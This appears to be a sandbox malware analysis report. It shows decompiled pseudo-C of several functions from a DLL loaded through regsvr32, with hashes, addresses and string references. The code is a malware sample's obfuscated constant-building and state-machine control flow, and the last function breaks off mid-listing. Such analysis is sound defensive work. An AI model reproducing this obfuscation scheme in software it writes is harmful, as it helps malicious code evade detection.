Opcode ID: a93ef0bfbf9ae1e7aef5dc23f96064688a8cf9209768b530ed149d4610586a93
Instruction ID: 3e71c43689951b0b0a5b1446a7dff4d53f407906158fef8f9b456108d9d68f45
Opcode Fuzzy Hash: a93ef0bfbf9ae1e7aef5dc23f96064688a8cf9209768b530ed149d4610586a93
Instruction Fuzzy Hash: F1F0E93A7DD35BA6EB0062B28E00FB50D345FA2BD4F11C8356742EB0D0CFA0D8822278

Uniqueness

Uniqueness Score: -1.00%

Function 1002086F Relevance: 5.3, Strings: 4, Instructions: 291
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1002086F(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				unsigned int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _t350;
				signed int _t365;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				void* _t413;
				void* _t414;
				signed int* _t417;

				_t417 =  &_v1692;
				_v1592 = 0x54223b;
				_v1592 = _v1592 + 0xffff20d9;
				_v1592 = _v1592 << 0xd;
				_v1592 = _v1592 ^ 0x68628000;
				_v1636 = 0x951192;
				_v1636 = _v1636 ^ 0xe4591946;
				_v1636 = _v1636 * 0x7d;
				_t413 = __ecx;
				_v1636 = _v1636 ^ 0xb7a04f84;
				_t414 = 0x8db4d32;
				_v1580 = 0x89db32;
				_t368 = 0x54;
				_v1580 = _v1580 / _t368;
				_v1580 = _v1580 ^ 0x0002efec;
				_v1620 = 0x60f63e;
				_t369 = 0x3f;
				_v1620 = _v1620 / _t369;
				_v1620 = _v1620 >> 6;
				_v1620 = _v1620 ^ 0x000dc88a;
				_v1588 = 0xc7f499;
				_v1588 = _v1588 << 0xe;
				_v1588 = _v1588 ^ 0xfd2fba11;
				_v1628 = 0xd656e4;
				_v1628 = _v1628 | 0xc7a22b2a;
				_v1628 = _v1628 + 0xffffefe2;
				_v1628 = _v1628 ^ 0xc7f6578e;
				_v1600 = 0xe6cf89;
				_v1600 = _v1600 | 0x87e0b820;
				_t365 = 0x43;
				_v1600 = _v1600 / _t365;
				_v1600 = _v1600 ^ 0x02070dcf;
				_v1688 = 0x58c9f4;
				_t370 = 0x6b;
				_v1688 = _v1688 * 0x4e;
				_v1688 = _v1688 + 0xf6c1;
				_v1688 = _v1688 ^ 0xfaf08b9c;
				_v1688 = _v1688 ^ 0xe1f64896;
				_v1648 = 0xfd8d8;
				_v1648 = _v1648 << 0xc;
				_v1648 = _v1648 + 0xffff587b;
				_v1648 = _v1648 >> 1;
				_v1648 = _v1648 ^ 0x7ec2a2f3;
				_v1568 = 0xad305f;
				_v1568 = _v1568 << 0xc;
				_v1568 = _v1568 ^ 0xd309e005;
				_v1680 = 0x4fc7b6;
				_v1680 = _v1680 << 0xe;
				_v1680 = _v1680 << 0xe;
				_v1680 = _v1680 + 0xffff2ae5;
				_v1680 = _v1680 ^ 0x5ffd2033;
				_v1664 = 0x6918d4;
				_v1664 = _v1664 ^ 0x94992ac7;
				_v1664 = _v1664 + 0xff7a;
				_v1664 = _v1664 * 0x44;
				_v1664 = _v1664 ^ 0x901af4d1;
				_v1604 = 0x5f933e;
				_v1604 = _v1604 + 0xffffba62;
				_v1604 = _v1604 / _t370;
				_v1604 = _v1604 ^ 0x000c4e27;
				_v1640 = 0x3d3793;
				_t371 = 0x52;
				_v1640 = _v1640 / _t371;
				_v1640 = _v1640 >> 0xf;
				_v1640 = _v1640 ^ 0x000707b4;
				_v1656 = 0xcbfe6d;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 0xe;
				_v1656 = _v1656 << 0xb;
				_v1656 = _v1656 ^ 0x00079401;
				_v1672 = 0xb5b9c5;
				_v1672 = _v1672 + 0xffff1916;
				_t372 = 0x6d;
				_v1672 = _v1672 / _t372;
				_v1672 = _v1672 + 0xd331;
				_v1672 = _v1672 ^ 0x000c40c2;
				_v1624 = 0x47e096;
				_v1624 = _v1624 >> 6;
				_v1624 = _v1624 ^ 0x85dd1da1;
				_v1624 = _v1624 ^ 0x85d20b68;
				_v1596 = 0xc5a058;
				_v1596 = _v1596 ^ 0x12068749;
				_v1596 = _v1596 >> 0xf;
				_v1596 = _v1596 ^ 0x00024404;
				_v1692 = 0x81e036;
				_v1692 = _v1692 | 0xe95a0602;
				_v1692 = _v1692 + 0xffff703f;
				_v1692 = _v1692 >> 0xd;
				_v1692 = _v1692 ^ 0x00041281;
				_v1572 = 0xe00009;
				_t373 = 0x5d;
				_v1572 = _v1572 * 0x79;
				_v1572 = _v1572 ^ 0x69ee7fb3;
				_v1612 = 0xb9ca07;
				_v1612 = _v1612 | 0xf5eeb77b;
				_v1612 = _v1612 ^ 0xf5f5a2ba;
				_v1564 = 0x72ecf2;
				_v1564 = _v1564 + 0xffff3fd0;
				_v1564 = _v1564 ^ 0x0078ca44;
				_v1616 = 0x777066;
				_v1616 = _v1616 | 0x03ad7a2e;
				_v1616 = _v1616 / _t365;
				_v1616 = _v1616 ^ 0x0009207e;
				_v1684 = 0x553ecb;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 / _t373;
				_v1684 = _v1684 >> 9;
				_v1684 = _v1684 ^ 0x0005ee0c;
				_v1668 = 0xde0347;
				_v1668 = _v1668 >> 0xb;
				_v1668 = _v1668 | 0xaf7dc97f;
				_v1668 = _v1668 ^ 0xaf7ed29b;
				_v1576 = 0x3d3240;
				_v1576 = _v1576 | 0x06a853f0;
				_v1576 = _v1576 ^ 0x06b88832;
				_v1676 = 0xb81ae3;
				_v1676 = _v1676 + 0xffff0050;
				_v1676 = _v1676 >> 0xa;
				_v1676 = _v1676 * 0x72;
				_v1676 = _v1676 ^ 0x0016335c;
				_v1584 = 0x2bfb4c;
				_v1584 = _v1584 * 0x3c;
				_v1584 = _v1584 ^ 0x0a4cbf0d;
				_v1632 = 0xcbd6;
				_v1632 = _v1632 | 0xb0a819a0;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x16199620;
				_v1644 = 0x9db4aa;
				_t374 = 0x24;
				_v1644 = _v1644 / _t374;
				_v1644 = _v1644 << 1;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 ^ 0x2307e993;
				_v1652 = 0xc7c890;
				_v1652 = _v1652 | 0xb8b5086a;
				_v1652 = _v1652 ^ 0xccc5c34c;
				_v1652 = _v1652 | 0x35dab112;
				_v1652 = _v1652 ^ 0x75fc2f4c;
				_v1608 = 0x2338f1;
				_v1608 = _v1608 << 9;
				_t375 = 0x73;
				_v1608 = _v1608 * 0xd;
				_v1608 = _v1608 ^ 0x93c1e6b0;
				_v1660 = 0xf269a1;
				_v1660 = _v1660 * 0x54;
				_t350 = _v1660 / _t375;
				_v1660 = _t350;
				_v1660 = _v1660 ^ 0x88b3fe82;
				_v1660 = _v1660 ^ 0x8807d7ff;
				do {
					while(_t414 != 0x8db4d32) {
						if(_t414 != 0xe26f7e5) {
							if(_t414 == 0xffacc8e) {
								_push(_v1660);
								_push(_v1608);
								_push(_v1652);
								_push(0);
								_push(0);
								_push(_v1644);
								_push(0);
								_push(_v1636);
								return E100163F0(_v1632,  &_v1040, 0);
							}
							goto L9;
						}
						_t289 =  &_v1620; // 0x9207e
						E10009574(_v1580,  &_v1560,  *_t289, _v1588);
						 *((short*)(E1000FFDE(_v1628, _v1600,  &_v1560, _v1688) + _v1592 * 2)) = 0;
						E1000B200(_v1648, _v1568, __eflags, _v1680,  &_v520, _v1664);
						_push(_v1672);
						_push(_v1656);
						_push(_v1640);
						E1001734A(_v1624, __eflags, _v1596, _v1692, _v1572,  &_v1040, E10004BB4(0x10001854, _v1604), _v1612, 0x10001854,  &_v1560);
						E1000B9D7(_v1564, _v1616, _t357, _v1684);
						_t350 = E10009B80(_v1668, _v1576, _v1676,  &_v1040, _v1584, _t413);
						_t417 =  &(_t417[0x19]);
						__eflags = _t350;
						if(__eflags != 0) {
							_t414 = 0xffacc8e;
							continue;
						}
						return _t350;
					}
					_t414 = 0xe26f7e5;
					L9:
					__eflags = _t414 - 0x1903836;
				} while (__eflags != 0);
				return _t350;
			}

0x1002086f
0x10020875
0x1002087f
0x10020887
0x1002088c
0x10020894
0x1002089c
0x100208ad
0x100208b1
0x100208b3
0x100208bb
0x100208c0
0x100208d4
0x100208d9
0x100208e2
0x100208ed
0x100208f9
0x100208fe
0x10020904
0x10020909
0x10020911
0x10020919
0x1002091e
0x10020926
0x1002092e
0x10020936
0x1002093e
0x10020946
0x1002094e
0x1002095a
0x1002095f
0x10020965
0x1002096d
0x1002097a
0x1002097b
0x1002097f
0x10020987
0x1002098f
0x10020997
0x1002099f
0x100209a4
0x100209ac
0x100209b0
0x100209b8
0x100209c3
0x100209cb
0x100209d6
0x100209de
0x100209e3
0x100209e8
0x100209f0
0x100209f8
0x10020a00
0x10020a08
0x10020a15
0x10020a19
0x10020a21
0x10020a29
0x10020a37
0x10020a3b
0x10020a45
0x10020a53
0x10020a58
0x10020a5c
0x10020a61
0x10020a69
0x10020a71
0x10020a76
0x10020a7b
0x10020a80
0x10020a88
0x10020a90
0x10020a9e
0x10020aa3
0x10020aa7
0x10020aaf
0x10020ab7
0x10020abf
0x10020ac4
0x10020acc
0x10020ad4
0x10020adc
0x10020ae4
0x10020ae9
0x10020af1
0x10020af9
0x10020b01
0x10020b09
0x10020b0e
0x10020b16
0x10020b2b
0x10020b2c
0x10020b33
0x10020b3e
0x10020b46
0x10020b4e
0x10020b56
0x10020b61
0x10020b6c
0x10020b77
0x10020b7f
0x10020b8f
0x10020b93
0x10020b9b
0x10020ba3
0x10020bae
0x10020bb2
0x10020bb7
0x10020bbf
0x10020bc7
0x10020bcc
0x10020bd4
0x10020bdc
0x10020be7
0x10020bf2
0x10020bfd
0x10020c05
0x10020c0d
0x10020c17
0x10020c1b
0x10020c23
0x10020c30
0x10020c34
0x10020c3e
0x10020c4b
0x10020c58
0x10020c5d
0x10020c65
0x10020c73
0x10020c78
0x10020c7e
0x10020c82
0x10020c87
0x10020c8f
0x10020c97
0x10020c9f
0x10020ca7
0x10020caf
0x10020cb7
0x10020cbf
0x10020cc9
0x10020cca
0x10020cce
0x10020cd6
0x10020ce3
0x10020ceb
0x10020ced
0x10020cf1
0x10020cf9
0x10020d01
0x10020d01
0x10020d0f
0x10020d13
0x10020d19
0x10020d26
0x10020d2a
0x10020d2e
0x10020d2f
0x10020d30
0x10020d34
0x10020d35
0x00000000
0x10020d42
0x00000000
0x10020d13
0x10020d5b
0x10020d67
0x10020d92
0x10020dad
0x10020db2
0x10020dbb
0x10020dbf
0x10020e07
0x10020e1f
0x10020e43
0x10020e48
0x10020e4b
0x10020e4d
0x10020e53
0x00000000
0x10020e53
0x10020d4f
0x10020d4f
0x10020e5a
0x10020e5c
0x10020e5c
0x10020e5c
0x00000000

Strings

;"T, xrefs: 10020875
~ , xrefs: 10020D5B
P, xrefs: 10020C05
@2=, xrefs: 10020BDC

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;"T$@2=$P$~
API String ID: 0-2090378798
Opcode ID: 5c6b7fc3c0cb125636a79a4ce55d0708bbf7220eeba4ca4241ee5f5d00722ca7
Instruction ID: fbbc84ae0623be931bf917a8adfbb1deba5b7275f289d73373ce53d8172073bc
Opcode Fuzzy Hash: 5c6b7fc3c0cb125636a79a4ce55d0708bbf7220eeba4ca4241ee5f5d00722ca7
Instruction Fuzzy Hash: 77E110715083819FD368CF21C58AA4BFBE2FBC4748F50891DF6E986260D7B59A49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1001B384 Relevance: 5.1, Strings: 4, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001B384(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v316;
				char _t111;
				signed int _t115;
				void* _t119;
				signed int _t121;
				signed int _t122;
				char* _t123;
				intOrPtr* _t139;
				void* _t140;

				_t139 = __ecx;
				_v52 = _v52 & 0x00000000;
				_v56 = 0xd5d3a;
				_v48 = 0x6bcac4;
				_v48 = _v48 | 0x1de54c34;
				_v48 = _v48 ^ 0x1deb727c;
				_v20 = 0x4a8ee4;
				_v20 = _v20 | 0x7571e7fa;
				_v20 = _v20 + 0x43ae;
				_v20 = _v20 ^ 0x757ffddb;
				_v12 = 0x5f9a23;
				_v12 = _v12 ^ 0x6f575c07;
				_v12 = _v12 + 0xffff1834;
				_v12 = _v12 | 0xd2aacf7c;
				_v12 = _v12 ^ 0xffab9ea5;
				_v16 = 0x3d9cb9;
				_v16 = _v16 + 0xffffda9f;
				_v16 = _v16 + 0xdf13;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x00040e6f;
				_v8 = 0x5a6aaf;
				_v8 = _v8 | 0xd7766ed9;
				_v8 = _v8 + 0xffffb4ea;
				_t121 = 0x58;
				_v8 = _v8 / _t121;
				_v8 = _v8 ^ 0x0277f467;
				_v28 = 0x653c;
				_v28 = _v28 + 0x1a49;
				_t122 = 0x49;
				_v28 = _v28 * 0xa;
				_v28 = _v28 ^ 0x0003f9b6;
				_v32 = 0xbfe2f6;
				_v32 = _v32 * 0x60;
				_v32 = _v32 | 0x59794ef9;
				_v32 = _v32 ^ 0x5ffcb752;
				_v36 = 0xe261a5;
				_v36 = _v36 * 0x2d;
				_v36 = _v36 ^ 0x27cc4bbb;
				_v44 = 0x423372;
				_v44 = _v44 | 0x375ad816;
				_v44 = _v44 ^ 0x3752bfef;
				_v24 = 0xd017ee;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0xffffdb58;
				_t123 =  &_v316;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x01c65a52;
				_v40 = 0xeaeb3e;
				_v40 = _v40 ^ 0x001fb34b;
				_v40 = _v40 ^ 0x00f4cc77;
				while(1) {
					_t111 =  *_t139;
					if(_t111 == 0) {
						break;
					}
					if(_t111 == 0x2e) {
						 *_t123 = 0;
					} else {
						 *_t123 = _t111;
						_t123 = _t123 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E1001E545(_v48, _v20, _v12,  &_v316);
					if(_t140 != 0) {
						L8:
						_t115 = E1000B099(_v28, _v32, _t139 + 1, _v36, _v44);
						_push(_t140);
						_push(_v40);
						return E1001B558(_t115 ^ 0x32c9db43, _v24);
					}
					_t119 = E1001E9A4(_v16, _v8,  &_v316);
					_t140 = _t119;
					if(_t140 != 0) {
						goto L8;
					}
					return _t119;
				}
				goto L6;
			}

0x1001b38f
0x1001b391
0x1001b397
0x1001b39e
0x1001b3a5
0x1001b3ac
0x1001b3b3
0x1001b3ba
0x1001b3c1
0x1001b3c8
0x1001b3cf
0x1001b3d6
0x1001b3dd
0x1001b3e4
0x1001b3eb
0x1001b3f2
0x1001b3f9
0x1001b400
0x1001b407
0x1001b40b
0x1001b412
0x1001b419
0x1001b420
0x1001b42c
0x1001b431
0x1001b436
0x1001b43d
0x1001b444
0x1001b44f
0x1001b450
0x1001b453
0x1001b45a
0x1001b465
0x1001b468
0x1001b46f
0x1001b476
0x1001b481
0x1001b484
0x1001b48b
0x1001b492
0x1001b499
0x1001b4a0
0x1001b4a7
0x1001b4ab
0x1001b4b7
0x1001b4bd
0x1001b4c0
0x1001b4c7
0x1001b4ce
0x1001b4d5
0x1001b4e6
0x1001b4e6
0x1001b4ea
0x00000000
0x00000000
0x1001b4e0
0x1001b4ee
0x1001b4e2
0x1001b4e2
0x1001b4e4
0x1001b4e5
0x00000000
0x1001b4e5
0x1001b4f1
0x1001b506
0x1001b50c
0x1001b527
0x1001b537
0x1001b541
0x1001b542
0x00000000
0x1001b54f
0x1001b51b
0x1001b520
0x1001b525
0x00000000
0x00000000
0x1001b557
0x1001b557
0x00000000

Strings

<e, xrefs: 1001B43D
>, xrefs: 1001B4C7
r3B, xrefs: 1001B48B
:], xrefs: 1001B397

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :]$<e$>$r3B
API String ID: 0-1485665402
Opcode ID: eb99dc27ef89dc69684e43775f39206b32631dee6518afd9d64609821c688640
Instruction ID: 861a36b14f433d99885dd2792d862c9736864380f060a9d00fa8b19af2c6afe3
Opcode Fuzzy Hash: eb99dc27ef89dc69684e43775f39206b32631dee6518afd9d64609821c688640
Instruction Fuzzy Hash: C75163B1C0131ADBDF58CFA5C9865EEBBB1FB44308F20819AD411BA250D7744B4ACFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001F060 Relevance: 5.1, Strings: 4, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001F060(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t85;
				void* _t93;
				signed int _t99;
				void* _t102;
				void* _t116;
				void* _t117;
				signed int* _t120;

				_push(_a8);
				_t116 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t85);
				_v92 = 0x87b94a;
				_t120 =  &(( &_v100)[4]);
				_v92 = _v92 ^ 0x1dfbe376;
				_t117 = 0;
				_t102 = 0xe6ded3;
				_t99 = 0x43;
				_v92 = _v92 * 0x77;
				_v92 = _v92 ^ 0xb4cf2a6f;
				_v96 = 0xbeea88;
				_v96 = _v96 / _t99;
				_v96 = _v96 >> 4;
				_v96 = _v96 ^ 0x0006274f;
				_v72 = 0x574246;
				_v72 = _v72 + 0x8161;
				_v72 = _v72 ^ 0x005d6fe8;
				_v76 = 0x660f25;
				_v76 = _v76 + 0x2057;
				_v76 = _v76 ^ 0x006151c5;
				_v80 = 0x13506;
				_v80 = _v80 >> 9;
				_v80 = _v80 ^ 0x000453b6;
				_v88 = 0x98026b;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0x7c721fce;
				_v88 = _v88 ^ 0x7c7e284a;
				_v64 = 0xd87023;
				_v64 = _v64 * 0xa;
				_v64 = _v64 ^ 0x08756108;
				_v68 = 0xe54a44;
				_v68 = _v68 << 0xf;
				_v68 = _v68 ^ 0xa52016c2;
				_v100 = 0x81f64b;
				_v100 = _v100 + 0x8072;
				_v100 = _v100 * 0x25;
				_v100 = _v100 + 0xffff6ada;
				_v100 = _v100 ^ 0x12d6b641;
				_v84 = 0xf6b16d;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 >> 2;
				_v84 = _v84 ^ 0x00089bd4;
				do {
					while(_t102 != 0xe6ded3) {
						if(_t102 == 0x62ec412) {
							_t93 = E1001E831( &_v60, _v72, __eflags, _t116 + 0x1c, _v76, _v80, _v88);
							_t120 =  &(_t120[4]);
							__eflags = _t93;
							if(__eflags != 0) {
								_t102 = 0x789e7ca;
								continue;
							}
						} else {
							if(_t102 == 0x67373b3) {
								E10004603(_v92, _v96, _a4,  &_v60);
								_t102 = 0x62ec412;
								continue;
							} else {
								_t126 = _t102 - 0x789e7ca;
								if(_t102 != 0x789e7ca) {
									goto L11;
								} else {
									E1001E831( &_v60, _v64, _t126, _t116 + 4, _v68, _v100, _v84);
									_t117 =  !=  ? 1 : _t117;
								}
							}
						}
						L6:
						return _t117;
					}
					_t102 = 0x67373b3;
					L11:
					__eflags = _t102 - 0x90fc082;
				} while (__eflags != 0);
				goto L6;
			}

0x1001f067
0x1001f06b
0x1001f06d
0x1001f071
0x1001f072
0x1001f073
0x1001f078
0x1001f080
0x1001f083
0x1001f092
0x1001f094
0x1001f0a0
0x1001f0a1
0x1001f0a5
0x1001f0ad
0x1001f0c0
0x1001f0c4
0x1001f0c9
0x1001f0d1
0x1001f0d9
0x1001f0e1
0x1001f0e9
0x1001f0f1
0x1001f0f9
0x1001f101
0x1001f109
0x1001f10e
0x1001f116
0x1001f11e
0x1001f123
0x1001f12b
0x1001f133
0x1001f140
0x1001f144
0x1001f14c
0x1001f154
0x1001f159
0x1001f161
0x1001f169
0x1001f176
0x1001f17a
0x1001f182
0x1001f18a
0x1001f192
0x1001f197
0x1001f19c
0x1001f1a4
0x1001f1a4
0x1001f1b6
0x1001f229
0x1001f22e
0x1001f231
0x1001f233
0x1001f235
0x00000000
0x1001f235
0x1001f1b8
0x1001f1ba
0x1001f203
0x1001f20a
0x00000000
0x1001f1bc
0x1001f1bc
0x1001f1be
0x00000000
0x1001f1c0
0x1001f1d8
0x1001f1e5
0x1001f1e5
0x1001f1be
0x1001f1ba
0x1001f1e9
0x1001f1f1
0x1001f1f1
0x1001f23c
0x1001f23e
0x1001f23e
0x1001f23e
0x00000000

Strings

o], xrefs: 1001F0E1
J(~|, xrefs: 1001F12B
W , xrefs: 1001F0F1
DJ, xrefs: 1001F14C

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: DJ$J(~|$W $o]
API String ID: 0-2407399925
Opcode ID: 3bcc12f5ac2fc5b32713252af09d2934497e3cf7aaa2271855ffcfbd2aa4a50c
Instruction ID: 8bcf131bc71f2d2c418d9dc5cdd0aa29c842569b1c2e5309a4cb2313bc247f37
Opcode Fuzzy Hash: 3bcc12f5ac2fc5b32713252af09d2934497e3cf7aaa2271855ffcfbd2aa4a50c
Instruction Fuzzy Hash: 6E415671108382ABC798DF20C84582FBBE5FBD8758F50491DF5A696221D771CA89CB87

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3DF76 Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6DA3DF76(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E6DA3DE2E() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E6DA3DF25( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x6da855b4(_a4, _a8);
			}

0x6da3df85
0x6da3df99
0x6da3dfad
0x6da3dfc5
0x6da3dfaf
0x6da3dfb6
0x6da3dfb6
0x6da3dfcd
0x00000000
0x6da3dfcf
0x00000000
0x6da3dfd6
0x6da3dfcd
0x00000000
0x6da3df9b
0x00000000

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cafddcf1022f6f5fdbb504d0ca4ebda62216fe8b381b675d92ce3aee5ec136d
Instruction ID: de91e05ea389c8a634bd6f2aab79f9d2b39685872869b06d34c0bf24be3c3067
Opcode Fuzzy Hash: 2cafddcf1022f6f5fdbb504d0ca4ebda62216fe8b381b675d92ce3aee5ec136d
Instruction Fuzzy Hash: F3F01D3960D369EBDF025F65CD88AAE7B7ABF86348B06C010F915D5050FB31CA91DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C7D1 Relevance: 4.1, Strings: 3, Instructions: 308
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1000C7D1(void* __edx, intOrPtr _a4) {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				void* _t328;
				void* _t347;
				intOrPtr _t350;
				void* _t358;
				intOrPtr _t359;
				void* _t366;
				void* _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int* _t403;

				_push(_a4);
				_t394 = 0;
				_push(__edx);
				_push(0);
				E10009E7D(_t328);
				_v1120 = 0xa8af03;
				_t403 =  &(( &_v1192)[3]);
				_v1120 = _v1120 | 0xedefafed;
				_v1120 = _v1120 ^ 0xedefafc6;
				_t366 = 0x7d8f1b9;
				_v1104 = 0x89166b;
				_v1104 = _v1104 ^ 0xa282fcb4;
				_t395 = 0x46;
				_v1104 = _v1104 / _t395;
				_v1104 = _v1104 ^ 0x0250a09c;
				_v1152 = 0x57229d;
				_v1152 = _v1152 ^ 0xdbdd9ebd;
				_v1152 = _v1152 ^ 0x58dff7f1;
				_v1152 = _v1152 | 0x3eb2a147;
				_v1152 = _v1152 ^ 0xbff7ebd7;
				_v1048 = 0xb8c846;
				_t396 = 0x64;
				_v1048 = _v1048 * 0x24;
				_v1048 = _v1048 ^ 0x19f8efac;
				_v1172 = 0xb63c79;
				_v1172 = _v1172 << 0x10;
				_v1172 = _v1172 ^ 0x9f20c56e;
				_v1172 = _v1172 ^ 0xa4d07239;
				_v1172 = _v1172 ^ 0x078276d4;
				_v1064 = 0x73c8f0;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x39ecd93b;
				_v1096 = 0x5b127d;
				_v1096 = _v1096 | 0xfb2dad3d;
				_v1096 = _v1096 + 0xfffff8bb;
				_v1096 = _v1096 ^ 0xfb719434;
				_v1128 = 0x3e1acc;
				_v1128 = _v1128 + 0xffffe50e;
				_v1128 = _v1128 * 0x75;
				_v1128 = _v1128 ^ 0x1c53c386;
				_v1080 = 0xa37f8d;
				_v1080 = _v1080 | 0xec532642;
				_v1080 = _v1080 ^ 0xecf38e40;
				_v1164 = 0x409143;
				_v1164 = _v1164 * 0x1b;
				_v1164 = _v1164 << 0xe;
				_v1164 = _v1164 | 0x80f86da6;
				_v1164 = _v1164 ^ 0xd4f5d21a;
				_v1088 = 0xa7fd53;
				_v1088 = _v1088 | 0x1067475c;
				_v1088 = _v1088 ^ 0x10ec3827;
				_v1188 = 0x45d1bf;
				_v1188 = _v1188 + 0xffff1535;
				_v1188 = _v1188 | 0x024ee292;
				_v1188 = _v1188 << 7;
				_v1188 = _v1188 ^ 0x2779569e;
				_v1148 = 0xd3c2a6;
				_v1148 = _v1148 << 0xc;
				_v1148 = _v1148 + 0xffffd7c2;
				_v1148 = _v1148 | 0xda73b287;
				_v1148 = _v1148 ^ 0xfe71764d;
				_v1180 = 0x9ecc62;
				_v1180 = _v1180 | 0x5fab75b3;
				_v1180 = _v1180 * 0x61;
				_v1180 = _v1180 / _t396;
				_v1180 = _v1180 ^ 0x00b0b553;
				_v1056 = 0x160af0;
				_v1056 = _v1056 << 0xc;
				_v1056 = _v1056 ^ 0x60a03023;
				_v1136 = 0xc14d3;
				_v1136 = _v1136 << 1;
				_v1136 = _v1136 ^ 0xb80067c2;
				_v1136 = _v1136 ^ 0xb81f117a;
